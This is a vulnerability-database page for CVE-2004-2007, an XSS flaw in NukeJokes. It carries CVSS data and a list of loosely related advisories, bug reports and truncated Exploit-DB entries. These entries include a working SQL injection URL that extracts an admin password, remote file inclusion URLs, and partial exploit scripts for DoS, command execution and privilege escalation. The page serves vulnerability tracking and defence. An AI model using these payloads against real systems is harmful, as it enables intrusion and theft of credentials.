CVE-2004-2007
published 2004-05-08CVE-2004-2007: Cross-site scripting (XSS) vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to inject arbitrary HTML or web script via the (1)…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.75%
75.1th percentile
Cross-site scripting (XSS) vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to inject arbitrary HTML or web script via the (1) cat parameter in a CatView function or (2) jokeid parameter in a JokeView function.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adam_webb | nukejokes | — | — |
| adam_webb | nukejokes | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6x86-v9c9-p52j: Cross-site scripting (XSS) vulnerability in modules
ghsa_unreviewed·2022-04-29
CVE-2004-2007 [MEDIUM] GHSA-6x86-v9c9-p52j: Cross-site scripting (XSS) vulnerability in modules
Cross-site scripting (XSS) vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to inject arbitrary HTML or web script via the (1) cat parameter in a CatView function or (2) jokeid parameter in a JokeView function.
Red Hat
lhaca issue might affect lha packages
vendor_redhat·2007-07-01·CVSS 10.0
CVE-2007-3375 [CRITICAL] lhaca issue might affect lha packages
lhaca issue might affect lha packages
Stack-based buffer overflow in Lhaca File Archiver before 1.21 allows user-assisted remote attackers to execute arbitrary code via a crafted LZH archive, as exploited by malware such as Trojan.Lhdropper.
Statement: Not vulnerable, Red Hat do not ship the Lhaca file archiver. Note that an identical flaw was found affecting the lha file archiver in 2004, CVE-2004-0234. This issue was corrected by security update RHSA-2004:178 for Red Hat Enterprise Linux 2.1 and 3. Red Hat Enterprise Linux 4 was not vulnerable as it contained a backported patch to correct this issue from release.
Red Hat
core-dumping unreadable binaries via PT_INTERP
vendor_redhat·2007-01-26·CVSS 2.1
CVE-2007-0958 [LOW] core-dumping unreadable binaries via PT_INTERP
core-dumping unreadable binaries via PT_INTERP
Linux kernel 2.6.x before 2.6.20 allows local users to read unreadable binaries by using the interpreter (PT_INTERP) functionality and triggering a core dump, a variant of CVE-2004-1073.
Red Hat
CVE-2007-3008: Mbedthis AppWeb before 2
vendor_redhat·CVSS 5.8
CVE-2007-3008 [MEDIUM] CVE-2007-3008: Mbedthis AppWeb before 2
Mbedthis AppWeb before 2.2.2 enables the HTTP TRACE method, which has unspecified impact probably related to remote information leaks and cross-site tracing (XST) attacks, a related issue to CVE-2004-2320 and CVE-2005-3398.
Statement: The Apache Software Foundation do not treat this as a security issue. A configuration change can be made to disable the ability to respond to HTTP TRACE requests if required.
For more information please see:
http://www.apacheweek.com/issues/03-01-24#news
No detection rules found.
Exploit-DB
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
exploitdb·2011-04-11
CVE-2011-2007 Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/49997/info
Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip
Exploit-DB
Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-1689 Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)
Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: nis2004_get.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX
Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.
By sending a overly long string to the "Get()" method, an attacker may be
able to execute arbitrary code.
Exploit-DB
3Com OfficeConnect Routers - Remote Denial of Service
exploitdb·2009-12-19
CVE-2004-1585 3Com OfficeConnect Routers - Remote Denial of Service
3Com OfficeConnect Routers - Remote Denial of Service
---
###############
# Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
# Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)
# Attacker -> Tested from GNU/Linux (Sidux and Ubuntu)
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit by HTTP
#
# Additional info:
# - I tested it in other similar 3Com router and the system do not crash, but the Internet connection yes.
# - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############
require "socket"
host = ARGV[0]
buffer = "A"
send = ""
puts ""
if !host
puts " 3Com OfficeConnect
Exploit-DB
Aconon Mail 2004 - Directory Traversal
exploitdb·2008-01-23
CVE-2008-0464 Aconon Mail 2004 - Directory Traversal
Aconon Mail 2004 - Directory Traversal
---
Application: aconon(R) Mail
Affected versions: probably all known, tested against 2007 Enterprise
SQL 11.7.0 and 2004 Enterprise SQL 11.5.1
Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...)
Exploitation: remote
Description: Aconon Mail is a commercial newsletter software, providing
a feature rich web interface for both, users and administrators. This
includes a public available archive of sent newsletters. Those archived
e-mails may be accessed through the web browser, processed by a template
engine. The used template may be overwritten by any user, modifying the
HTTP-GET "template" form parameter. This parameter is checked against
code injection, not against directory traversal though.
Proof of Concept:
http://www.aco
Exploit-DB
Epic Games Unreal Engine Logging Function - Remote Denial of Service
exploitdb·2007-08-20
CVE-2007-4442 Epic Games Unreal Engine Logging Function - Remote Denial of Service
Epic Games Unreal Engine Logging Function - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/25374/info
The Unreal Engine is prone to a remote denial-of-service vulnerability because the application fails to properly bounds-check user-supplied input.
Successfully exploiting this issue allows remote attackers to corrupt application memory in a manner that causes a crash. Remote code execution may be possible, but this has not been confirmed.
Versions of Unreal Engine that are included in Unreal Tournament 2003 and 2004 are vulnerable. Given the reuse of the engine in multiple other products, other games and versions are also likely vulnerable.
This vulnerability also affects America's Army 2.8.2 when Punkbuster is enabled on the local server; other versions may a
Exploit-DB
EFS Easy Chat Server 2.2 - Remote Denial of Service
exploitdb·2007-08-14
CVE-2004-2466 EFS Easy Chat Server 2.2 - Remote Denial of Service
EFS Easy Chat Server 2.2 - Remote Denial of Service
---
# milw0rm.com [2007-08-14]
Exploit-DB
InoutMailingListManager 3.1 - Remote Command Execution
exploitdb·2007-04-10
CVE-2007-2004 InoutMailingListManager 3.1 - Remote Command Execution
InoutMailingListManager 3.1 - Remote Command Execution
---
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
";
if ($argc
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(get
Exploit-DB
AspWebCalendar 4.5 - 'eventid' SQL Injection
exploitdb·2007-03-22
CVE-2004-1552 AspWebCalendar 4.5 - 'eventid' SQL Injection
AspWebCalendar 4.5 - 'eventid' SQL Injection
---
# Title : aspWebCalendar Remote SQL Injection Vulnerability
# Author : parad0x
# Contact : :(
# D.Page : http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$ : free
#S.Page : http://fullrevolution.com
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]
Example:
/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config
"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron
"""""""""""""""""""""
www.p4r4d0x.com
# milw0rm.com [2007-03-22]
Exploit-DB
WebCalendar 0.9.45 - 'includedir' Remote File Inclusion
exploitdb·2007-03-15
CVE-2007-1483 WebCalendar 0.9.45 - 'includedir' Remote File Inclusion
WebCalendar 0.9.45 - 'includedir' Remote File Inclusion
---
|-------------------------------------------------------------------------------|
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Authord : Drackanz |
| Contact : Drackanz [at] gmail [] com |
| Vendor : http://www.k5n.us/webcalendar.php |
|-------------------------------------------------------------------------------|
| Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://l
Exploit-DB
PMB Services 3.0.13 - Multiple Remote File Inclusions
exploitdb·2007-03-09
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
PMB Services 3.0.13 - Multiple Remote File Inclusions
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] et contributeurs (voir www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// affichage du detail pour un auteur
require_once($base_path.'/includes/templates
Exploit-DB
SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion
exploitdb·2007-02-20
CVE-2007-1060 SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion
SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_66$2007
[ECHO_ADV_66$2007] SendStudio <= 2004.14 Remote File Inclusion Vulnerability
Author : M.Hasran Addahroni
Date : Feb, 20th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv66-K-159-2007.txt
Critical Lvl : Dangerous
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : SendStudio
version : <= 2004.14
URL : http://www.interspire.com/sendstudio/
Description :
SendStudio is PHP email marketing software that lets you create, send and track an unlimited number of email messages and autoresponders. Over
Exploit-DB
Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
exploitdb·2007-01-29
CVE-2007-0467 Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
---
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre
# Lance M. Havok
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 [email protected]..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...
# 0000370: 0c00 0000 3400 000
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (3)
exploitdb·2006-10-06
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (3)
eXtremail 1.x/2.1 - Remote Format String (3)
---
source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' comm
Exploit-DB
Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2004-05-08
CVE-2004-2007 Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities
Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/10306/info
It has been reported that the NukeJokes module is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input.
Multiple SQL injection issues exists due to a failure of the application to do any sanitization on user input prior to using the offending input in an SQL query.
These SQL issues may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash or corruption of database data.
Multiple cross-site scripting vulnerabilities have been reported to exist d
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (2)
exploitdb·2001-06-21
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (2)
eXtremail 1.x/2.1 - Remote Format String (2)
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (1)
exploitdb·2001-06-21
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (1)
eXtremail 1.x/2.1 - Remote Format String (1)
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
Bugzilla
CVE-2007-3375 lhaca issue might affect lha packages
bugzilla·2007-07-10·CVSS 10.0
CVE-2007-3375 [CRITICAL] CVE-2007-3375 lhaca issue might affect lha packages
CVE-2007-3375 lhaca issue might affect lha packages
CERT notified us of a flaw in Lhaca LHA Extended Header handling, but on closer
look at the advisory this looks really similar to the code in header.c in lharc
as distributed in older RHEL releases.
http://vuln.sg/lhaca121-en.html
We need to look through the lharc code for older RHEL to make sure it is not
vulnerable to this issue.
Marking this bug as private for now, as it isn't public that this might affect
lharc too.
Discussion:
This is fixed in Red Hat packages by lha-114i-sec.patch.
Investigation showed that this was in fact the issue from 2004:
http://marc.info/?l=bugtraq&m=108422737918885&w=2 CVE-2004-0234
So LHACA appeared to be vulnerable to this issue due to shared codebase.
Bugzilla
CVE-2007-3555: moodle cross site scripting vulnerability
bugzilla·2007-07-09·CVSS 4.3
CVE-2007-3555 [MEDIUM] CVE-2007-3555: moodle cross site scripting vulnerability
CVE-2007-3555: moodle cross site scripting vulnerability
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3555
"Cross-site scripting (XSS) vulnerability in index.php in Moodle 1.7.1 allows
remote attackers to inject arbitrary web script or HTML via a style expression
in the search parameter, a different vulnerability than CVE-2004-1424."
Appears to affect 1.6.x and 1.8.x too:
http://eduspaces.net/moodlenews/weblog/181794.html
http://download.moodle.org/stable18/CHANGES
http://download.moodle.org/stable16/CHANGES
Discussion:
Built 1.8.2 for rawhide, which addresses this. Will push to 7, etc after testing.
---
moodle-1.8.2-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
Bugzilla
CVE-2007-0958 core-dumping unreadable binaries via PT_INTERP
bugzilla·2007-06-08·CVSS 2.1
CVE-2007-0958 [LOW] CVE-2007-0958 core-dumping unreadable binaries via PT_INTERP
CVE-2007-0958 core-dumping unreadable binaries via PT_INTERP
CVE-2004-1073 is still an issue -- a patched PoC can still cause a
coredump of a non-readable binary such as /usr/bin/sudo; PoC attached;
the tweak is question is adding:
eph.p_memsz = 4097;
Run "./poc /usr/bin/sudo" and a "core" spits out -- WFM on a 2.6.17.x
kernel.
To reproduce, do
* grab poc at the end of advisory.
* add line "eph.p_memsz = 4096;" after "eph.p_filesz = 4096;"
where first "4096" is something equal to or greater than 4096.
* ./poc /usr/bin/sudo && ls -l
Here I get:
-rw------- 1 ad ad 102400 2007-01-15 19:17 core
---s--x--x 2 root root 101820 2007-01-15 19:15 /usr/bin/sudo
Check for MAY_READ as binfmt_misc.c does.
Discussion:
committed in stream rhel‑4.5.z build 55.0.1
---
An advisory has been issued
Bugzilla
CVE-2007-0958 core-dumping unreadable binaries via PT_INTERP
bugzilla·2007-02-23·CVSS 2.1
CVE-2007-0958 [LOW] CVE-2007-0958 core-dumping unreadable binaries via PT_INTERP
CVE-2007-0958 core-dumping unreadable binaries via PT_INTERP
+++ This bug was initially created as a clone of Bug #228886 +++
CVE-2004-1073 is still an issue -- PoC can still cause a coredump of a
non-readable binary such as /usr/bin/sudo; PoC attached; the tweak is question
is adding:
eph.p_memsz = 4097;
Run "./poc /usr/bin/sudo" and a "core" spits out -- WFM on a 2.6.17.x kernel.
-- Additional comment from [email protected] on 2007-02-15 14:07 EST --
Created an attachment (id=148136)
Proposed upstream patch
-- Additional comment from [email protected] on 2007-02-23 14:04 EST --
This request was evaluated by Red Hat Product Management for inclusion in a Red
Hat Enterprise Linux maintenance release. Product Management has requested
further review of this request by Red Hat Engine
http://marc.info/?l=bugtraq&m=108404714232579&w=2http://www.securityfocus.com/bid/10306http://www.waraxe.us/index.php?modname=sa&id=28https://exchange.xforce.ibmcloud.com/vulnerabilities/16096http://marc.info/?l=bugtraq&m=108404714232579&w=2http://www.securityfocus.com/bid/10306http://www.waraxe.us/index.php?modname=sa&id=28https://exchange.xforce.ibmcloud.com/vulnerabilities/16096
2004-05-08
Published